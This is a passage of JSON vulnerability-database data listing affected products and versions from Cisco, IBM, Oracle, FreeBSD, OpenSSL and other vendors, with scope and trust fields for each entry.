        "vendor": "cisco",
        "version": "10.3(1)"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.4"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "bm security identity governance and intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.1"
      },
      {
        "model": "security manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.12"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.7"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.131)"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.20"
      },
      {
        "model": "project openssl 1.0.2d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.3"
      },
      {
        "model": "prime access registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "onepk all-in-one vm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.1(1)"
      },
      {
        "model": "prime lan management solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4.3.0"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.8"
      },
      {
        "model": "spa525g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "algo audit and compliance if",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.32"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.4"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "9.3-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "abyp-0t-2s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "unified attendant console department edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.26"
      },
      {
        "model": "netezza platform software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.29-9"
      },
      {
        "model": "series ip phones vpn feature",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8800-0"
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9971"
      },
      {
        "model": "abyp-2t-0s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "nexus series switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6000"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.4.5"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.6"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3387"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.1.1"
      },
      {
        "model": "webex messenger service",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.20"
      },
      {
        "model": "abyp-10g-4sr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "telepresence server mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70104.2"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "media experience engines",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "10.3-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.2.2"
      },
      {
        "model": "security network controller 1.0.3352m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "mysql enterprise backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.10"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.2"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "connected grid router 15.6.2.15t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "video distribution suite for internet streaming",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4300"
      },
      {
        "model": "telepresence server on multiparty media mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3204.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.12"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.116"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.7"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "cloupia unified infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5:20"
      },
      {
        "model": "jabber for mac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "agent desktop for cisco unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "counter fraud management for safer payments",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.0"
      },
      {
        "model": "telepresence server on multiparty media mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3104.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.31"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70006.2.17"
      },
      {
        "model": "digital media players series 5.3 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4400"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.19"
      },
      {
        "model": "project openssl 1.0.1n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3204.1"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "packet tracer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.0"
      },
      {
        "model": "network analysis module",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.3.1"
      },
      {
        "model": "project openssl 1.0.1o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "unified wireless ip phone",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1"
      },
      {
        "model": "anyconnect secure mobility client for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "security access manager for web",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.27"
      },
      {
        "model": "virtual security gateway vsg2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux x86 64 -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.17"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.10"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "policy suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings client on premises",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-2.7"
      },
      {
        "model": "10.2-release-p12",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "spa51x series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "unified ip conference phone for third-party call control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "unified intelligence center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.4"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.0.0"
      },
      {
        "model": "common services platform collector",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.9.1"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.7"
      },
      {
        "model": "project openssl 1.0.2e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.14"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(3.10000.9)"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "project openssl 1.0.1q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.16"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment intirim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.133"
      },
      {
        "model": "telepresence sx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.9"
      },
      {
        "model": "anyconnect secure mobility client for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "webex meetings client hosted",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "webex meetings for wp8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.13"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-108"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.13"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(2.1)"
      },
      {
        "model": "webex meetings for wp8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.18"
      },
      {
        "model": "physical access control gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.36"
      },
      {
        "model": "wide area application services",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.5.7"
      },
      {
        "model": "9.3-release-p24",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex messenger service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security privileged identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "10.1-release-p19",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "mmp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.10"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.1"
      },
      {
        "model": "prime ip express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application and content networking system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.5.41"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.6"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "mysql workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.1.4"
      },
      {
        "model": "10.1-release-p30",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "netezza platform software 7.2.0.7-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "9.3-release-p13",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.2.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "intelligent automation for cloud",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0.9.8"
      },
      {
        "model": "cognos business intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "edge digital media player 1.6rb4 5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "300"
      },
      {
        "model": "mds series multilayer switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "99510"
      },
      {
        "model": "abyp-10g-4sr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "9.3-release-p36",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89450"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.4.1"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20280.6"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30002.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.10"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.2"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.12"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.28"
      },
      {
        "model": "webex meeting center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.11"
      },
      {
        "model": "partner supporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.24"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4.4.0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.11"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.29"
      },
      {
        "model": "mobility services engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.0"
      },
      {
        "model": "edge digital media player",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3401.2.0.20"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.1"
      },
      {
        "model": "abyp-0t-4s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "unified series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "78000"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.8"
      },
      {
        "model": "spa30x series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.13"
      },
      {
        "model": "10.2-release-p11",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2"
      },
      {
        "model": "enterprise content management system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "42000"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.11"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4400"
      },
      {
        "model": "security access manager for web",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1.0"
      },
      {
        "model": "socialminer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "standalone rack server cimc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.34"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.2.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "mysql enterprise backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.12.2"
      },
      {
        "model": "tivoli netcool system service monitors fp14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "intracer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "jabber for apple ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.6.2"
      },
      {
        "model": "video surveillance series high-definition ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "40002.4.7"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.7"
      },
      {
        "model": "9.3-release-p33",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.5"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1051.07"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "84200"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.24"
      },
      {
        "model": "jabber for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ironport email security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.112"
      },
      {
        "model": "spa525g",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "anyconnect secure mobility client for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "mmp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.0.5"
      },
      {
        "model": "9.3-release-p41",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli netcool system service monitors fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime network registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud object store",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.8"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "ne",
